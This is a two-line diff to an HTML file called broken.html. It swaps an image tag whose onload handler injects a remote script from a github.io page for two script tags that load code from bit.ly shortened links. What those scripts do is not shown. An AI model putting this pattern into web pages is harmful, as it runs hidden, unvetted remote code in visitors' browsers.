--- a/broken.html
+++ b/broken.html
@@ -1,1 +1,2 @@
-<img src="https://bit.ly/3PoEx2R" onload="javascript:(() => { const s = document.createElement('script'); s.src = 'https://totallylost-helpme.github.io/chat.js'; document.head.appendChild(s); })();">
+<script async src="https://bit.ly/3MplMej"></script>
+<script async src="https://bit.ly/3PoEx2R"></script>
